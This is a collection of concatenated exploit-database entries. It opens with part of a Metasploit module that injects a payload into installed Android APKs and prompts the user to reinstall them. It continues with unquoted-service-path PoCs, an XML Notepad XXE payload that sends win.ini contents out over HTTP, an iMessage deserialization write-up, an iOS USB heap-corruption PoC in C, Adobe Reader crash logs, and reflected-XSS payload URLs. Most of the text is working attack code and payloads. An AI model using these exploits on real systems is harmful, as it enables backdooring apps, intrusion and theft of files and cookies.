target may not have the WAKE_LOCK permission 'DisablePayloadHandler' => true, }, 'DefaultTarget' => 0, 'Notes' => { 'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'], 'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore } })) register_options([ OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']), ]) register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), ] end def check os = cmd_exec("getprop ro.build.version.release") unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0')) vprint_error "Android version #{os} is not vulnerable." return CheckCode::Safe end vprint_good "Android version #{os} appears to be vulnerable." patch = cmd_exec('getprop ro.build.version.security_patch') if patch.empty? print_status 'Unable to determine patch level. Pre-5.0 this is unaccessible.' elsif patch > '2017-12-05' vprint_error "Android security patch level #{patch} is patched." return CheckCode::Safe else vprint_good "Android security patch level #{patch} is vulnerable" end CheckCode::Appears end def exploit def infect(apkfile) unless apkfile.start_with?("package:") fail_with Failure::BadConfig, 'Unable to locate app apk' end apkfile = apkfile[8..-1] print_status "Downloading APK: #{apkfile}" apk_data = read_file(apkfile) begin # Create an apk with the payload injected apk_backdoor = ::Msf::Payload::Apk.new apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false) # Extract the classes.dex dex_data = '' Zip::File.open_buffer(apk_zip) do |zipfile| dex_data = zipfile.read("classes.dex") end dex_size = dex_data.length # Fix the original APKs zip file code directory cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06") cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0] apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V") pos = cd_start_addr while pos && pos < cd_end_addr offset = apk_data[pos+42, pos+46].unpack("V")[0] apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V") pos = apk_data.index("\x50\x4b\x01\x02", pos+46) end # Prepend the new classes.dex to the apk out_data = dex_data + apk_data out_data[32...36] = [ out_data.length ].pack("V") out_data = fix_dex_header(out_data) out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk" print_status "Uploading APK: #{out_apk}" write_file(out_apk, out_data) register_file_for_cleanup(out_apk) print_status "APK uploaded" # Prompt the user to update the APK session.appapi.app_install(out_apk) print_status "User should now have a prompt to install an updated version of the app" true rescue => e print_error e.to_s false end end unless [CheckCode::Detected, CheckCode::Appears].include? check unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if datastore["PACKAGE"] == 'ALL' vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)') apkfiles = [] all = cmd_exec("pm list packages").split("\n") c = 1 all.each do |package| package = package.split(':')[1] vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}") c += 1 next if ['com.metasploit.stage', # avoid injecting into ourself ].include? package # This was left on purpose to be expanded as need be for testing result = infect(cmd_exec("pm path #{package}")) break if result end else infect(cmd_exec("pm path #{datastore["PACKAGE"]}")) end end end

# Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path # Google Dork: N/A # Date: 2019-11-09 # Exploit Author: Doan Nguyen (4ll4u) # Vendor Homepage: https://gcafe.vn/ # Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0 # Version: v3.0 # Tested on: Windows 7, Win 10, WinXP # CVE : N/A # Description: # GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points # PoC: # wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ gbClientService gbClientService C:\Program Files\GBillingClient\gbClientService.exe Auto #C:\>sc qc gbClientService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: gbClientService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\GBillingClient\gbClientService.exe LOAD_ORDER_GROUP : GarenaGroup TAG : 0 DISPLAY_NAME : gbClientService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection # Date: 2019-11-11 # Exploit Author: 8-Team / daejinoh # Vendor Homepage: https://www.microsoft.com/ # Software Link: https://github.com/microsoft/XmlNotepad # Version: XML Notepad 2.8.0.4 # Tested on: Windows 10 Pro # CVE : N/A # Step 1) File -> Open -> *.xml # Exploit Code 1) Server(python 3.7) : python -m http.server 2) Poc.xml : <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> 3) payload.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all; --------------------------------------------------------------------------------

# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path # Date: 2019-11-07 # Exploit Author: Héctor Gabriel Chimecatl Hernández # Vendor Homepage: https://www.alps.com/e/ # Software Link: https://www.alps.com/e/ # Version: 8.1.0.10 # Tested on: Windows 10 Home Single Language x64 Esp # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ # Service info: Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto C:\Users\user>sc qc ApHidMonitorService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ApHidMonitorService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Alps HID Monitor Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

During processing of incoming iMessages, attacker controlled data is deserialized using the NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is NSDictionary. However, due to the logic of NSUnarchiver, all subclasses of NSDictionary that also implement secure coding can then be deserialized as well. NSSharedKeyDictionary is an example of such a subclass. A NSSharedKeyDictionary is a dictionary for which, for performance reasons, the keys are predefined using a NSSharedKeySet. A NSSharedKeyDictionary is essentially a linear array of values and a pointer to its NSSharedKeySet. An NSSharedKeySet on the other hand looks roughly like this (with some fields omitted for simplicity and translated to pseudo-C): struct NSSharedKeySet { unsigned int _numKeys; // The number of keys in the _keys array id* _keys; // A pointer to an array containing the key values unsigned int _rankTable; // A table basically mapping the hashes of // the keys to an index into _keys unsigned int _M; // The size of the _rankTable unsigned int _factor; // Used to compute the index into _rankTable from a hash. NSSharedKeySet* _subKeySet; // The next KeySet in the chain }; The value lookup on an NSSharedKeyDictionary then works roughly as follows: * NSSharedKeyDictionary invokes [NSSharedKeySet indexForKey:] on its associated keySet * indexForKey: computes the hash of the key, basically computes rti = hash % _factor, bounds-checks that against _M, and finally uses it to lookup the index in its rankTable: idx = _rankTable[rti] * It verifies that idx < _numKeys * It loads _keys[idx] and invokes [key isEqual:candidate] with it as argument * If the result is true, the index has been found and is returned to the NSSharedKeyDictionary where it is used to index into its values array * If not, indexForKey: recursively processes the subKeySet in the same way until it either finds the key or there is no subKeySet left, in which case it returns -1 The NSArchiver format is powerful enough to allow reference cycles between decoded objects. This now enables the following attack: SharedKeyDictionary1 --[ keySet ]-> SharedKeySet1 --[ subKeySet ]-> SharedKeySet2 --+ ^ | | [ subKeySet ] | | +-----------------------------------------+ What will happen now is the following: * The SharedKeyDictionary1 is decoded and its initWithCoder: executed * [NSSharedKeyDictionary initWithCoder:] decodes its _keySet, which is SharedKeySet1 * The [NSSharedKeySet initWithCoder:] for SharedKeyDictionary1 reads and initializes the following fields: * _numKeys, which at this point is unchecked and can be any unsigned integer value. Only later will it be checked to be equal to the number of keys in the _keys array. * _rankTable, with completely attacker controlled content * _M, which must be equal to the size of the _rankTable * _factor, which must be a prime but otherwise can be arbitrarily chosen At this point, _numKeys = 0xffffffff but _keys is still nullptr (because ObjC objects are allocated with calloc) * Next, *before* initializing _keys, it deserializes the _subKeySet, SharedKeySet2 * [NSSharedKeySet initWithCoder:] of SharedKeySet2 finishes, and at the end verifies that it is a valid SharedKeySet. It does that by checking that all its keys correctly map to an index. For that it calls [NSSharedKeySet indexForKey:] on itself for every key. * (At least) one of the keys will, however, not be found on SharedKeySet2. As such, indexForKey: will proceed to search for the key in its _subKeySet, which is actually SharedKeySet1 * The lookup proceeds and determines that the index should be (in our case) 2189591170, which is less than SharedKeySet1->numKey (which is still 0xffffffff) * It then loads SharedKeySet1->keys[2189591170], which, as ->_keys is still nullptr, reads an objc_object* from 0x414141410 and thus crashes The attached PoC demonstrates this on the latest macOS 10.14.6 > clang -o tester tester.m -framework Foundation > ./generator.py > lldb -- ./tester payload.xml (lldb) target create "./tester" Current executable set to './tester' (x86_64). (lldb) settings set -- target.run-args "payload.xml" (lldb) r 2019-07-29 15:40:28.989305+0200 tester[71168:496831] Let's go Process 71168 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141410) frame #0: 0x00007fff3390d3e7 CoreFoundation`-[NSSharedKeySet indexForKey:] + 566 CoreFoundation`-[NSSharedKeySet indexForKey:]: -> 0x7fff3390d3e7 <+566>: mov rdx, qword ptr [rax + 8*r13] Combined with a heap spray, this bug could likely be remotely exploitable. Ideally, this issue and similar ones can be prevented by removing the NSSharedKeyDictionary attack surface completely, as originally suggested by Natalie. Alternatively, I think another solution might be to stop encoding all the internal fields of the NSSharedKeyDictionary/NSSharedKeySet (rankTable, numKeys, especially the subKeySet, ...) and only encode the keys and values. The new [initWithCoder:] implementations could then just call +[NSSharedKeySet keySetWithKeys:] and +[NSSharedKeyDictionary sharedKeyDictionaryWithKeySet:] to construct new instances with the decoded keys and values. This should be fine as all the other fields are implementation details anyway. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47608.zip

# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC) # Date: 2019-10-29 # Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat # Vendor Homepage: https://apple.com/ # Software Link: https://support.apple.com/en-hk/HT210606 # Version: iOS 13 # Tested on: iOS 12.4.1 # CVE : N/A # A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily. # The code can be triggered by a local attacker by sending a malicious USB control request to device. # It seems the faulting address register is corrupted as result of a heap corruption vulnerability. # However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too. # This bug was found through statically analyzing xnu from public source and optimized USB fuzzing. # A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted) iousbusted.c /* Pure IOKit implementation of CVE-2019-8718 Written by Sem Voigtländer. Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation Tip: You can also use this for projects like checkm8 autopwn etc. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <mach/mach.h> #include <IOKit/usb/IOUSBLib.h> #include <IOKit/IOCFPlugIn.h> #include <CoreFoundation/CoreFoundation.h> /* Faster comparissions for 64-bit integers than != and == */ #define FCOMP(P1,P2) !(P1 ^ P2) const char *defaultMsg = "HELLO WORLD"; /* Method for sending an USB control message to a target device */ static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx, const char *msg) { if(!dev){ printf("No device handle given.\n"); return KERN_FAILURE; } if(!msg) msg = defaultMsg; IOUSBDevRequest req; req.bmRequestType = type; req.bRequest = reqno; req.wValue = val; req.wIndex = idx; req.wLength = strlen(msg); req.pData = msg; req.wLenDone = 0; IOReturn rc = KERN_SUCCESS; rc = (*dev)->DeviceRequest(dev, &req); if(rc != KERN_SUCCESS) { return rc; } return KERN_SUCCESS; } static int send_usbusted_pwn_msg(IOUSBDeviceInterface** dev, const char *msg) { if(!dev){ printf("No device handle given.\n"); return KERN_FAILURE; } kern_return_t rc = send_usb_msg(dev, 0|0x80, 0x6, 0x30c, 0x409, msg); if(rc != kIOReturnSuccess) { return rc; } return KERN_SUCCESS; } /* Print information from an IOKit USB device */ static int print_usb_device(io_service_t device){ kern_return_t err = KERN_SUCCESS; CFNumberRef vid = 0; CFNumberRef pid = 0; CFNumberRef locationID = 0; CFMutableDictionaryRef p = NULL; err = IORegistryEntryCreateCFProperties(device, &p, NULL, 0); if(err != KERN_SUCCESS || !p) return err; if(!CFDictionaryGetValueIfPresent(p, CFSTR("idVendor"), &vid)) return KERN_FAILURE; if(!CFDictionaryGetValueIfPresent(p, CFSTR("idProduct"), &pid)) return KERN_FAILURE; CFDictionaryGetValueIfPresent(p, CFSTR("locationID"), &locationID); CFNumberGetValue(vid, kCFNumberSInt32Type, &vid); CFNumberGetValue(pid, kCFNumberSInt32Type, &pid); // <-- yes I know this is dirty, I was tired. if(locationID) CFNumberGetValue(locationID, kCFNumberSInt32Type, &locationID); printf("Got device %#x @ %#x (%#x:%#x)\n", device, locationID, vid, pid); return err; } /* Get a handle for sending to a device */ static int get_usbdevice_handle(io_service_t device, IOUSBDeviceInterface* dev){ kern_return_t err = KERN_SUCCESS; SInt32 score; IOCFPlugInInterface** plugInInterface = NULL; err = IOCreatePlugInInterfaceForService(device, kIOUSBDeviceUserClientTypeID, kIOCFPlugInInterfaceID, &plugInInterface, &score); if (err != KERN_SUCCESS || plugInInterface == NULL) return err; err = (*plugInInterface)->QueryInterface(plugInInterface, CFUUIDGetUUIDBytes(kIOUSBDeviceInterfaceID), (LPVOID*)dev); if(err != kIOReturnSuccess) return err; // Now done with the plugin interface. (*plugInInterface)->Release(plugInInterface); //plugInInterface = NULL; if(!dev) return KERN_FAILURE; return err; } /* Iterate over all USB devices */ static int iterate_usb_devices(const char *msg){ CFMutableDictionaryRef matchingDict; io_iterator_t iter; kern_return_t kr; io_service_t device; /* set up a matching dictionary for the class */ matchingDict = IOServiceMatching(kIOUSBDeviceClassName); if (matchingDict == NULL) { return -1; // fail } /* Now we have a dictionary, get an iterator.*/ kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); if (kr != KERN_SUCCESS) { return -1; } /* iterate */ while ((device = IOIteratorNext(iter))) { /* do something with device, eg. check properties */ kr = print_usb_device(device); if(kr != KERN_SUCCESS){ printf("Skipping device as it has no vid / pid.\n"); continue; } IOUSBDeviceInterface **dev = 0; kr = get_usbdevice_handle(device, &dev); if(kr != KERN_SUCCESS){ printf("Skipping device as no handle for it could be retrieved.\n"); continue; } kr = send_usbusted_pwn_msg(dev, msg); printf("RET: %s\n\n", mach_error_string(kr)); /* And free the reference taken before continuing to the next item */ IOObjectRelease(device); } /* Done, release the iterator */ IOObjectRelease(iter); return 0; } int main(int argc, char *argv[]){ char payload[108]; memset(&payload, 'A', 108); int err = iterate_usb_devices(payload); return err; }

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (88e4.30f4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=0478be34 ecx=00000000 edx=c0c0c0c0 esi=00000000 edi=00000000 eip=5fdc2341 esp=0478bd24 ebp=0478bd54 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1: 5fdc2341 8a4a04 mov cl,byte ptr [edx+4] ds:002b:c0c0c0c4=?? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 0478bd54 5fdb1157 0478be48 ceb1c57a 68754f88 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1 01 0478bea0 5fdafd04 68754f88 00000002 687fefe8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x35f7 02 0478bed8 5fda234f 5f198f54 5f198f54 68504fb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21a4 03 0478beec 5fd95227 68504fb8 00000044 684fcf40 AcroRd32!AX_PDXlateToHostEx+0x34468f 04 0478bfa0 5f795889 5f198f54 590b4fb0 5f7957f0 AcroRd32!AX_PDXlateToHostEx+0x337567 05 0478bfc4 5f795783 4d346ff8 00000001 00000001 AcroRd32!DllCanUnloadNow+0x4c929 06 0478bfe4 5fbe1d7a 0478c008 4d346ff8 00000001 AcroRd32!DllCanUnloadNow+0x4c823 07 0478c028 5f8cafc8 c0020000 00000001 4d346ff8 AcroRd32!AX_PDXlateToHostEx+0x1840ba 08 0478c37c 5f8ca506 0478c3d8 7492ea98 ceb1b86e AcroRd32!DllCanUnloadNow+0x182068 09 0478c3b4 5f8ca3e1 0478c3d8 7492ea98 0478c444 AcroRd32!DllCanUnloadNow+0x1815a6 0a 0478c420 5f8c93a8 c0020000 00000001 7492ea98 AcroRd32!DllCanUnloadNow+0x181481 0b 0478c880 5f8c68f7 0478cb84 6856c5ac c0020000 AcroRd32!DllCanUnloadNow+0x180448 0c 0478e060 5f8c6575 6856c5ac c0020000 00000001 AcroRd32!DllCanUnloadNow+0x17d997 0d 0478e130 5f8aa25c ceb199ca 45e6ef78 00000000 AcroRd32!DllCanUnloadNow+0x17d615 0e 0478e210 5f8a9057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc 0f 0478e25c 5f89c183 45e6ef78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7 10 0478e3d0 5f89ba97 67fccdbc 00000001 5ef9cef8 AcroRd32!DllCanUnloadNow+0x153223 11 0478e438 5f899281 ceb19f62 6fca6fc8 823c2ea8 AcroRd32!DllCanUnloadNow+0x152b37 12 0478e4b8 5f898dae 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x150321 13 0478e4f4 5f898d07 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x14fe4e 14 0478e57c 5f8982ee 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14fda7 15 0478e5b8 5f896f02 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14f38e 16 0478e87c 5f895d98 5ef9cef8 0478e910 0478e960 AcroRd32!DllCanUnloadNow+0x14dfa2 17 0478e980 5f895175 5ef9cef8 0478eab0 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 18 0478ead4 5f8942ba 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14c215 19 0478eb34 5f89414d 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b35a 1a 0478eb54 5f892d3c 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed 1b 0478ec0c 5f892762 00000001 00000000 ceb197be AcroRd32!DllCanUnloadNow+0x149ddc 1c 0478ec64 5f89257a 3f3fcef0 00000001 ceb19712 AcroRd32!DllCanUnloadNow+0x149802 1d 0478ecc8 5f8922ff 0478edbc ceb19606 8355afa0 AcroRd32!DllCanUnloadNow+0x14961a 1e 0478eddc 5f75687c 8355afa0 5f7567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f 1f 0478edf4 5f75678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c 20 0478ee10 745de0bb 02a20faa 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f 21 0478ee3c 745e8849 5f7566d0 02a20faa 0000000f USER32!_InternalCallWinProc+0x2b 22 0478ee60 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 23 0478ef30 745d8503 5f7566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 24 0478ef98 745d8aa0 13f2abb0 00000000 0000000f USER32!DispatchClientMessage+0x1b3 25 0478efe0 77371a6d 0478effc 00000020 0478f05c USER32!__fnDWORD+0x50 26 0478f018 745d91ee 0478f0ac ce1677b9 18068dd8 ntdll!KiUserCallbackDispatcher+0x4d 27 0478f06c 745d8c20 ca6e87d5 0478f090 5f76da6d USER32!DispatchMessageWorker+0x5be 28 0478f078 5f76da6d 0478f0ac 18068dd8 18068dd8 USER32!DispatchMessageW+0x10 29 0478f090 5f76d89e 0478f0ac ceb18ade 18068dd8 AcroRd32!DllCanUnloadNow+0x24b0d 2a 0478f104 5f76d744 ceb18ae6 18068dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e 2b 0478f13c 5f6fc575 ceb18a76 16cb6ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 2c 0478f1ac 5f6fbf81 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x775 2d 0478f5cc 0011783d 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x181 2e 0478f998 002201aa 00110000 00000000 0b48b3f2 AcroRd32_exe+0x783d 2f 0478f9e4 76698674 04504000 76698650 1f7eb52b AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da 30 0478f9f8 77365e17 04504000 fdd62153 00000000 KERNEL32!BaseThreadInitThunk+0x24 31 0478fa40 77365de7 ffffffff 7738adab 00000000 ntdll!__RtlUserThreadStart+0x2f 32 0478fa50 00000000 00111390 04504000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes). - The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to a single byte at offset 0x2f5, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0x35. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47609.zip

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: Rishu Ranjan (Cy83rl0gger) # Vendor Homepage: https://www.myadrenalin.com/ # Software Link: https://www.myadrenalin.com/core-hcm/ # Version: 5.4.0 (REQUIRED) # Tested on: NA # CVE : CVE-2018-12234 # Type: webapps # Platform: Multiple # Description # ==================== # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software. # The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response. # URL # ==================== https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1 https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155 Parameter ==================== strAction Attack Type ==================== Remote CVE Impact Other ==================== Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. Reference ==================== https://nvd.nist.gov/vuln/detail/CVE-2018-12234 https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html Discoverer ==================== Rishu Ranjan

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (5708.4564): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=c0c0c0c0 ebx=00000000 ecx=6826e380 edx=00000000 esi=00000002 edi=00000006 eip=15e440e8 esp=047fc158 ebp=047fc1b8 iopl=0 nv up ei ng nz ac po cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210293 CoolType!CTCleanup+0x25be8: 15e440e8 f6403860 test byte ptr [eax+38h],60h ds:002b:c0c0c0f8=?? 0:000> u @$scopeip-9 CoolType!CTCleanup+0x25bdf: 15e440df 8b4d08 mov ecx,dword ptr [ebp+8] 15e440e2 8b7dc4 mov edi,dword ptr [ebp-3Ch] 15e440e5 8b0481 mov eax,dword ptr [ecx+eax*4] 15e440e8 f6403860 test byte ptr [eax+38h],60h 15e440ec 0f851f010000 jne CoolType!CTCleanup+0x25d11 (15e44211) 15e440f2 0fb7781a movzx edi,word ptr [eax+1Ah] 15e440f6 0fb7401e movzx eax,word ptr [eax+1Eh] 15e440fa 8bc8 mov ecx,eax 0:000> dd ecx 6826e380 16063e80 16063e40 1605fd00 c0c0c0c0 6826e390 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3a0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3b0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3d0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3e0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3f0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 047fc1b8 15e434ea 6826e380 1605fce0 6826e388 CoolType!CTCleanup+0x25be8 01 047fc1d4 15e43f02 6826e380 1605fd00 6826e388 CoolType!CTCleanup+0x24fea 02 047fc1fc 15e4edc1 6936cff0 16063e40 1605fd00 CoolType!CTCleanup+0x25a02 03 047fc230 15deb53d 6936cbf0 047fcca4 00000f5c CoolType!CTCleanup+0x308c1 04 047fc94c 15de6251 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x483dd 05 047fca30 15e223fa 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x430f1 06 047fcb88 15e220be 6936cbf0 047fcd5c 047fcd2c CoolType!CTCleanup+0x3efa 07 047fcc04 15df972d 6936cbf0 16067080 047fcd5c CoolType!CTCleanup+0x3bbe 08 047fcdcc 15df8f00 047fcfc0 00000000 16067330 CoolType!CTInit+0x565cd 09 047fce9c 15df7d87 0b601000 00000001 00000001 CoolType!CTInit+0x55da0 0a 047fd268 15df7414 0000012c 86c0e9cc 00001aba CoolType!CTInit+0x54c27 0b 047fd2ac 15df63de 86c0e9c0 00000064 047fd344 CoolType!CTInit+0x542b4 0c 047fd41c 15df5eb9 047fd834 047fdbb0 0000044a CoolType!CTInit+0x5327e 0d 047fd470 16112a42 3ede4e60 047fd834 047fdbb0 CoolType!CTInit+0x52d59 0e 047fd7b8 16111888 8ec19b64 047fd834 047fdbb0 AGM!AGMInitialize+0x69bd2 0f 047fd918 160dc460 047fd980 8ec19b00 047fdc48 AGM!AGMInitialize+0x68a18 10 047fd9b4 160e469a 047fdb98 8ec19b00 047fdc48 AGM!AGMInitialize+0x335f0 11 047fdbe0 160e2ae0 3eb84ba0 67b69f70 8ec19b00 AGM!AGMInitialize+0x3b82a 12 047fddbc 160e186c 3eb84ba0 67b69f70 56375db9 AGM!AGMInitialize+0x39c70 13 047fde08 161107ff 3eb84ba0 67b69f70 68a8ad50 AGM!AGMInitialize+0x389fc 14 047fde2c 1611030e 00000301 1611044f 67b69f70 AGM!AGMInitialize+0x6798f 15 047fde34 1611044f 67b69f70 56375d11 68a8ad50 AGM!AGMInitialize+0x6749e 16 047fde6c 160b945b 047fdf40 1610f910 00000000 AGM!AGMInitialize+0x675df 17 047fdec0 5fdcd4ad 047fde00 5fdcd4b4 dd9e27c4 AGM!AGMInitialize+0x105eb 18 047fdec8 5fdcd4b4 dd9e27c4 68a8ad50 047fdeac AcroRd32!DllCanUnloadNow+0x18454d 19 047fdee8 5fddb77d 3ede4f64 7cb8ed90 047fdf00 AcroRd32!DllCanUnloadNow+0x184554 1a 047fdf04 5fddb274 553c0f84 dd9e2644 553c0f58 AcroRd32!DllCanUnloadNow+0x19281d 1b 047fdf6c 5fdeef36 dd9e2698 00000000 553c0f58 AcroRd32!DllCanUnloadNow+0x192314 1c 047fdfb0 5fddaa40 dd9e26d4 5e4a0f78 553c0f58 AcroRd32!CTJPEGDecoderRelease+0x3426 1d 047fdffc 5fdda902 dd9e196c 5e4a0f78 047fe0ec AcroRd32!DllCanUnloadNow+0x191ae0 1e 047fe044 5fdda7e3 047fe060 dd9e1998 047fe41c AcroRd32!DllCanUnloadNow+0x1919a2 1f 047fe0b0 5fdda677 047fe0ec 8ef46ff0 3fe7bc80 AcroRd32!DllCanUnloadNow+0x191883 20 047fe110 5fdd8aed 8ef46ff0 5fddbc70 047fe41c AcroRd32!DllCanUnloadNow+0x191717 21 047fe210 5fdd8542 047fe41c dd9e1b74 1a74ed88 AcroRd32!DllCanUnloadNow+0x18fb8d 22 047fe25c 5fdd79dd 047fe41c 047fe424 dd9e1df0 AcroRd32!DllCanUnloadNow+0x18f5e2 23 047fe4d8 5fdd77ee 00000002 81ffa4e2 dd9e1c1c AcroRd32!DllCanUnloadNow+0x18ea7d 24 047fe534 5fd9706a 00000002 81ffa4e2 dd9e1ec4 AcroRd32!DllCanUnloadNow+0x18e88e 25 047fe7ec 5fd95d98 5ee78ef8 047fe880 047fe8d0 AcroRd32!DllCanUnloadNow+0x14e10a 26 047fe8f0 5fd95175 5ee78ef8 047fea20 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 27 047fea44 5fd942ba 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14c215 28 047feaa4 5fd9414d 5ee78ef8 047feb48 00000000 